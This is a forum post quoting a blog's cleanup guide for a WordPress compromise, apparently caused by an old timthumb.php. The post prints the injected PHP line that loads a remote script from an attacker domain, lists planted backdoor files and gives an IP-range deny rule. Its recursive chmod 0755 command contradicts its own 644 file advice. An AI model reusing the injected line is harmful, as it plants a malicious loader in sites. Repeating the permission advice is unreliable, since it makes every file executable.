Going to quote my post for y’all
Hello,
I have/had a similar problem, not with my rss though.
You should read the following about superpuperdomain.com
What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.
Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.
I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.
I scoured the Internet and finally found a fix.
First, in your WordPress’s index.php, remove the following script added by the hack:
echo ‘<script type=”text/javascript” language=”javascript” src=”https://superpuperdomain.com/count.php?ref=’.urlencode($_SERVER[‘HTTP_REFERER’]) .'”></script>’;
Then remove three phony files added by the hackers (back up first, in case your installation actually requires these files):
/wp-admin/js/config.php
/wp-admin/common.php
/wp-content/udp.php
Do not try to open any of these files, as my antivirus sounded alarms immediately.
I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.
To increase your site’s security, make sure you have correct permissions for files and directories.
Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.
Run this bash command to set the correct permissions recursively for your WordPress installation:
chmod -R 0755 /wordpressdirectory
I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):
order allow,deny
deny from 91.220
allow from all
The malicious script was run from superpuperdomain.com and I had run a traceroute on that domain, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220) and they would receive a forbidden notice if they tried to access TechSpheria again.
Source: Techspheria
https://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/
Maybe it is a smart idea to check your WordPress installation for the files, ban the IP and update your timthumb.php…. Just in case ??
I guess we have to keep monitoring the website TechSperia, because yesterday they said there were two phony files, today there are three.
Kind regards, OceansDB